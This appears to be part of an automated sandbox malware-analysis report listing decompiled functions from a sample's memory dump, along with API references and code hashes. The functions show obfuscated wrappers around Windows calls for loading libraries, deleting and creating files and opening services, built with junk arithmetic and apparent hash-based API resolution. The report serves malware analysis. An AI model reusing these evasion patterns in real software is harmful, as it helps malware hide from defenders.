                                                                                                                                                                                                                    • Opcode ID: 8c1d555c1bc65e9f0a2884f2f3f3ccb1f594a915a4a9dbacb832ceb6ff040798
                                                                                                                                                                                                                    • Instruction ID: 559cdff3d812d5e7afe29ec2888e87c1800d9554df29ae4c57c416b190d4dcca
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c1d555c1bc65e9f0a2884f2f3f3ccb1f594a915a4a9dbacb832ceb6ff040798
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70012476A01208FBEF04DF94CD4AADEBBB1EB44704F208098FA196A250D7B14B64AB51
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                    			E0301A50D(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                    				struct HINSTANCE__* _t29;
                                                                                                                                                                                                                    				WCHAR* _t33;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_t33 = __edx;
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				E0301C6D8(_t23);
                                                                                                                                                                                                                    				_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                    				_v24 = 0xfc4883;
                                                                                                                                                                                                                    				_v12 = 0xf6df9d;
                                                                                                                                                                                                                    				_v12 = _v12 + 0xf5bd;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x00fb8632;
                                                                                                                                                                                                                    				_v8 = 0x79755e;
                                                                                                                                                                                                                    				_v8 = _v8 * 0x7c;
                                                                                                                                                                                                                    				_v8 = _v8 << 2;
                                                                                                                                                                                                                    				_v8 = _v8 << 0x10;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x66291c0e;
                                                                                                                                                                                                                    				E0301E554(0xa45f1f5c, 0xc6477825, 0x40);
                                                                                                                                                                                                                    				_t29 = LoadLibraryW(_t33); // executed
                                                                                                                                                                                                                    				return _t29;
                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                    0x0301a514
                                                                                                                                                                                                                    0x0301a517
                                                                                                                                                                                                                    0x0301a519
                                                                                                                                                                                                                    0x0301a51b
                                                                                                                                                                                                                    0x0301a520
                                                                                                                                                                                                                    0x0301a527
                                                                                                                                                                                                                    0x0301a530
                                                                                                                                                                                                                    0x0301a537
                                                                                                                                                                                                                    0x0301a53e
                                                                                                                                                                                                                    0x0301a545
                                                                                                                                                                                                                    0x0301a54c
                                                                                                                                                                                                                    0x0301a55e
                                                                                                                                                                                                                    0x0301a561
                                                                                                                                                                                                                    0x0301a565
                                                                                                                                                                                                                    0x0301a569
                                                                                                                                                                                                                    0x0301a576
                                                                                                                                                                                                                    0x0301a57f
                                                                                                                                                                                                                    0x0301a585

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000), ref: 0301A57F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.841044428.0000000003000000.00000040.00000010.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                    • String ID: ^uy
                                                                                                                                                                                                                    • API String ID: 1029625771-3807551107
                                                                                                                                                                                                                    • Opcode ID: 40e5d39ec50eca4ccf7c4df9de1f9aeea362e3a8a27fad28c93203cbbe9f2be6
                                                                                                                                                                                                                    • Instruction ID: 0d41efe1a464ac53c07bc9efc381a1919e82cd4b51fd0f9cc7909f73b338f4f6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40e5d39ec50eca4ccf7c4df9de1f9aeea362e3a8a27fad28c93203cbbe9f2be6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5016D71D02208EBCB10EFA5CA096DEBBB8EF40315F208098E5197B241D7B18F18EBD1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                    			E0301A9FE(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                    				int _t27;
                                                                                                                                                                                                                    				WCHAR* _t31;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_t31 = __edx;
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				E0301C6D8(_t21);
                                                                                                                                                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                    				_v20 = 0x399cdd;
                                                                                                                                                                                                                    				_v12 = 0xe5ebd1;
                                                                                                                                                                                                                    				_v12 = _v12 + 0x6b59;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x00e195ed;
                                                                                                                                                                                                                    				_v8 = 0x5e77a5;
                                                                                                                                                                                                                    				_v8 = _v8 >> 1;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xe0bea296;
                                                                                                                                                                                                                    				_v8 = _v8 * 0x33;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xbd091bf9;
                                                                                                                                                                                                                    				E0301E554(0xa45f1f5c, 0x5c4cea57, 0xdc);
                                                                                                                                                                                                                    				_t27 = DeleteFileW(_t31); // executed
                                                                                                                                                                                                                    				return _t27;
                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                    0x0301aa05
                                                                                                                                                                                                                    0x0301aa08
                                                                                                                                                                                                                    0x0301aa0a
                                                                                                                                                                                                                    0x0301aa0c
                                                                                                                                                                                                                    0x0301aa11
                                                                                                                                                                                                                    0x0301aa18
                                                                                                                                                                                                                    0x0301aa24
                                                                                                                                                                                                                    0x0301aa2b
                                                                                                                                                                                                                    0x0301aa32
                                                                                                                                                                                                                    0x0301aa39
                                                                                                                                                                                                                    0x0301aa40
                                                                                                                                                                                                                    0x0301aa43
                                                                                                                                                                                                                    0x0301aa58
                                                                                                                                                                                                                    0x0301aa5b
                                                                                                                                                                                                                    0x0301aa68
                                                                                                                                                                                                                    0x0301aa71
                                                                                                                                                                                                                    0x0301aa77

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0301AA71
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.841044428.0000000003000000.00000040.00000010.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                                                                    • String ID: Yk
                                                                                                                                                                                                                    • API String ID: 4033686569-4039134258
                                                                                                                                                                                                                    • Opcode ID: c9d28ccd3d8c054bc55e0b687c5c37717e36d54f54a2b3bd8abd73d07ea2729f
                                                                                                                                                                                                                    • Instruction ID: 4b64927efcbeb5bf5d5b3df49e107494744b168086763fae449726b863873a2c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9d28ccd3d8c054bc55e0b687c5c37717e36d54f54a2b3bd8abd73d07ea2729f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0F0F675D0260CEBDB04EBA8D946ADEBFB8EF50315F108099E81977240E3B55B149B91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                                                                                                    			E0300E2BD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                    				int _t22;
                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_t27 = __ecx;
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E0301C6D8(_t17);
                                                                                                                                                                                                                    				_v8 = 0x3d8de6;
                                                                                                                                                                                                                    				_v8 = _v8 >> 9;
                                                                                                                                                                                                                    				_v8 = _v8 | 0x97c7207c;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x97cae6a4;
                                                                                                                                                                                                                    				_v12 = 0x3c64e1;
                                                                                                                                                                                                                    				_v12 = _v12 << 0xb;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0xe32b8d0f;
                                                                                                                                                                                                                    				E0301E554(0xa45f1f5c, 0x22b8027, 0x193);
                                                                                                                                                                                                                    				_t22 = FindCloseChangeNotification(_t27); // executed
                                                                                                                                                                                                                    				return _t22;
                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                    0x0300e2c0
                                                                                                                                                                                                                    0x0300e2c1
                                                                                                                                                                                                                    0x0300e2c3
                                                                                                                                                                                                                    0x0300e2c6
                                                                                                                                                                                                                    0x0300e2c8
                                                                                                                                                                                                                    0x0300e2cc
                                                                                                                                                                                                                    0x0300e2cd
                                                                                                                                                                                                                    0x0300e2d2
                                                                                                                                                                                                                    0x0300e2dc
                                                                                                                                                                                                                    0x0300e2e5
                                                                                                                                                                                                                    0x0300e2ec
                                                                                                                                                                                                                    0x0300e2f3
                                                                                                                                                                                                                    0x0300e2fa
                                                                                                                                                                                                                    0x0300e2fe
                                                                                                                                                                                                                    0x0300e315
                                                                                                                                                                                                                    0x0300e31e
                                                                                                                                                                                                                    0x0300e324

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?), ref: 0300E31E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.841044428.0000000003000000.00000040.00000010.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                    • String ID: d<
                                                                                                                                                                                                                    • API String ID: 2591292051-3402581688
                                                                                                                                                                                                                    • Opcode ID: 7f59038ff963341ef7ed6a8ee8cdf60993775183d0d753b6e6aec5e1cccfcb66
                                                                                                                                                                                                                    • Instruction ID: 611223e83261123d807088117e26bb3f94e3d857f8b8f0a2d48539ba8e28e107
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f59038ff963341ef7ed6a8ee8cdf60993775183d0d753b6e6aec5e1cccfcb66
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3F06D76D0220CFBDB05DBD0D8068EEBF78DF40350F108089E81A67210D6B05B109B92
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 42%
                                                                                                                                                                                                                    			E0301A3E9(void* __ecx, long __edx, WCHAR* _a8, intOrPtr _a16, intOrPtr _a20, long _a24, intOrPtr _a28, intOrPtr _a32, long _a36, long _a40) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                    				long _t42;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a40);
                                                                                                                                                                                                                    				_t42 = __edx;
                                                                                                                                                                                                                    				_push(_a36);
                                                                                                                                                                                                                    				_push(_a32);
                                                                                                                                                                                                                    				_push(_a28);
                                                                                                                                                                                                                    				_push(_a24);
                                                                                                                                                                                                                    				_push(_a20);
                                                                                                                                                                                                                    				_push(_a16);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				E0301C6D8(_t29);
                                                                                                                                                                                                                    				_v8 = 0xad543f;
                                                                                                                                                                                                                    				_v8 = _v8 << 0xe;
                                                                                                                                                                                                                    				_v8 = _v8 >> 2;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x571878a2;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x425e1cb6;
                                                                                                                                                                                                                    				_v12 = 0x7fc0d0;
                                                                                                                                                                                                                    				_v12 = _v12 + 0xfffff8fd;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x007f0cd4;
                                                                                                                                                                                                                    				E0301E554(0xa45f1f5c, 0x94988138, 0x181);
                                                                                                                                                                                                                    				_t34 = CreateFileW(_a8, _a40, _a36, 0, _t42, _a24, 0); // executed
                                                                                                                                                                                                                    				return _t34;
                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                    0x0301a3f0
                                                                                                                                                                                                                    0x0301a3f5
                                                                                                                                                                                                                    0x0301a3f7
                                                                                                                                                                                                                    0x0301a3fa
                                                                                                                                                                                                                    0x0301a3fd
                                                                                                                                                                                                                    0x0301a400
                                                                                                                                                                                                                    0x0301a403
                                                                                                                                                                                                                    0x0301a406
                                                                                                                                                                                                                    0x0301a409
                                                                                                                                                                                                                    0x0301a40a
                                                                                                                                                                                                                    0x0301a40d
                                                                                                                                                                                                                    0x0301a40e
                                                                                                                                                                                                                    0x0301a410
                                                                                                                                                                                                                    0x0301a415
                                                                                                                                                                                                                    0x0301a41f
                                                                                                                                                                                                                    0x0301a428
                                                                                                                                                                                                                    0x0301a42c
                                                                                                                                                                                                                    0x0301a433
                                                                                                                                                                                                                    0x0301a43a
                                                                                                                                                                                                                    0x0301a441
                                                                                                                                                                                                                    0x0301a448
                                                                                                                                                                                                                    0x0301a45f
                                                                                                                                                                                                                    0x0301a476
                                                                                                                                                                                                                    0x0301a47d

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,?,00044A00,00000000,?,?,00000000), ref: 0301A476
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.841044428.0000000003000000.00000040.00000010.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                    • Opcode ID: 9f98f86fcd8de2101d85703ce12c8c1315dea8b9cd4bcee52f6a84a9a53ef4bc
                                                                                                                                                                                                                    • Instruction ID: 3ace94fed45979f19269feb09f0763c113ac29c7fed003215312e4c7e8eccc4a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f98f86fcd8de2101d85703ce12c8c1315dea8b9cd4bcee52f6a84a9a53ef4bc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B111C7290110CBBCF119F95CD09CDF7F79EF89324F118188FA1966220D6728A21EBA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                                                                    			E030174CF(int __ecx, void* __edx, intOrPtr _a4, void* _a8, short* _a12) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                    				int _t38;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_t38 = __ecx;
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E0301C6D8(_t29);
                                                                                                                                                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                    				_v20 = 0xa4fa4f;
                                                                                                                                                                                                                    				_v12 = 0x3abe18;
                                                                                                                                                                                                                    				_v12 = _v12 << 0xa;
                                                                                                                                                                                                                    				_v12 = _v12 >> 7;
                                                                                                                                                                                                                    				_v12 = _v12 << 1;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x03a667f7;
                                                                                                                                                                                                                    				_v8 = 0x45a23e;
                                                                                                                                                                                                                    				_v8 = _v8 >> 0xb;
                                                                                                                                                                                                                    				_v8 = _v8 | 0xb5017e38;
                                                                                                                                                                                                                    				_v8 = _v8 << 6;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x405a6ccd;
                                                                                                                                                                                                                    				E0301E554(0x19016132, 0x7417c54b, 0x10);
                                                                                                                                                                                                                    				_t34 = OpenServiceW(_a8, _a12, _t38); // executed
                                                                                                                                                                                                                    				return _t34;
                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                    0x030174d6
                                                                                                                                                                                                                    0x030174d9
                                                                                                                                                                                                                    0x030174db
                                                                                                                                                                                                                    0x030174de
                                                                                                                                                                                                                    0x030174e2
                                                                                                                                                                                                                    0x030174e3
                                                                                                                                                                                                                    0x030174e8
                                                                                                                                                                                                                    0x030174ef
                                                                                                                                                                                                                    0x030174fb
                                                                                                                                                                                                                    0x03017502
                                                                                                                                                                                                                    0x03017506
                                                                                                                                                                                                                    0x0301750a
                                                                                                                                                                                                                    0x0301750d
                                                                                                                                                                                                                    0x03017514
                                                                                                                                                                                                                    0x0301751b
                                                                                                                                                                                                                    0x0301751f
                                                                                                                                                                                                                    0x03017526
                                                                                                                                                                                                                    0x0301752a
                                                                                                                                                                                                                    0x0301753e
                                                                                                                                                                                                                    0x0301754d
                                                                                                                                                                                                                    0x03017553

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00A4FA4F,FFFF0429,?,?,?,?,?,00316875,0A1BFB89), ref: 0301754D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.841044428.0000000003000000.00000040.00000010.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: OpenService
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3098006287-0
                                                                                                                                                                                                                    • Opcode ID: 164ff8f88998ef5c2622f97210cd38959a7ef454554a0436b78416f1ca9472cc
                                                                                                                                                                                                                    • Instruction ID: b0cb648bb2f7f3314263f3572ceb507e7b4a08e800a7ab0c25e9443618e5aa6f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 164ff8f88998ef5c2622f97210cd38959a7ef454554a0436b78416f1ca9472cc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF01047690120CBBDF05EED4DC4A9DEBFB4EF04714F208498E91567251D3B25B28DB91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E03016D52() {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_v12 = 0x201161;
                                                                                                                                                                                                                    				_v12 = _v12 + 0xb36a;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x00247f79;
                                                                                                                                                                                                                    				_v8 = 0x239e7a;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xf99c9d58;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xf9b97f3c;
                                                                                                                                                                                                                    				E0301E554(0xa45f1f5c, 0xab0622b6, 0x50);
                                                                                                                                                                                                                    				ExitProcess(0);
                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                    0x03016d57
                                                                                                                                                                                                                    0x03016d5e
                                                                                                                                                                                                                    0x03016d65
                                                                                                                                                                                                                    0x03016d6c
                                                                                                                                                                                                                    0x03016d73
                                                                                                                                                                                                                    0x03016d7a
                                                                                                                                                                                                                    0x03016d94
                                                                                                                                                                                                                    0x03016d9e

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 03016D9E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.841044428.0000000003000000.00000040.00000010.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                                                    • Opcode ID: a122b493867602417b930f0a9de268a3edaec180e64286864dbfbe39b7f241e0
                                                                                                                                                                                                                    • Instruction ID: 81ece6172f177d09b7246ac84071e6e3a2eb9663f3b48308fdf4a78b8accecaa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a122b493867602417b930f0a9de268a3edaec180e64286864dbfbe39b7f241e0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0E039B0A21308BBDB48CBD5D946A9EBBB4AB40305F204088E60976290E7B11B549A62
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                    			E03006877(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                    				int _t32;
                                                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                                                    				WCHAR* _t40;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_t40 = __edx;
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				E0301C6D8(_t24);
                                                                                                                                                                                                                    				_v12 = 0xf4ca38;
                                                                                                                                                                                                                    				_v12 = _v12 >> 0xd;
                                                                                                                                                                                                                    				_t34 = 5;
                                                                                                                                                                                                                    				_v12 = _v12 / _t34;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0006577f;
                                                                                                                                                                                                                    				_v8 = 0xa9d358;
                                                                                                                                                                                                                    				_v8 = _v8 | 0xbfd8fadd;
                                                                                                                                                                                                                    				_v8 = _v8 * 0x27;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x3f164cd7;
                                                                                                                                                                                                                    				E0301E554(0xa45f1f5c, 0x9f092728, 0x18e);
                                                                                                                                                                                                                    				_t32 = lstrcmpiW(_t40, _a8); // executed
                                                                                                                                                                                                                    				return _t32;
                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                    0x0300687d
                                                                                                                                                                                                                    0x03006880
                                                                                                                                                                                                                    0x03006882
                                                                                                                                                                                                                    0x03006885
                                                                                                                                                                                                                    0x03006887
                                                                                                                                                                                                                    0x0300688c
                                                                                                                                                                                                                    0x03006895
                                                                                                                                                                                                                    0x0300689e
                                                                                                                                                                                                                    0x030068a9
                                                                                                                                                                                                                    0x030068ac
                                                                                                                                                                                                                    0x030068b3
                                                                                                                                                                                                                    0x030068ba
                                                                                                                                                                                                                    0x030068cf
                                                                                                                                                                                                                    0x030068d2
                                                                                                                                                                                                                    0x030068df
                                                                                                                                                                                                                    0x030068eb
                                                                                                                                                                                                                    0x030068f1

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.841044428.0000000003000000.00000040.00000010.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrcmpi
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1586166983-0
                                                                                                                                                                                                                    • Opcode ID: 3dd7cf760ab25b67abe97c2f97cbaf0e2bbca96cc917130f8850b1ae82fa3993
                                                                                                                                                                                                                    • Instruction ID: 1504328026f281a9f1dee1b00426e4b8f424108c271bcb7e0f017968544b5950
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3dd7cf760ab25b67abe97c2f97cbaf0e2bbca96cc917130f8850b1ae82fa3993
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07014B3590220CFBDB08DF90D9468DEBFB9EF45314F108199E8186B210D7715B60EB91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Non-executed Functions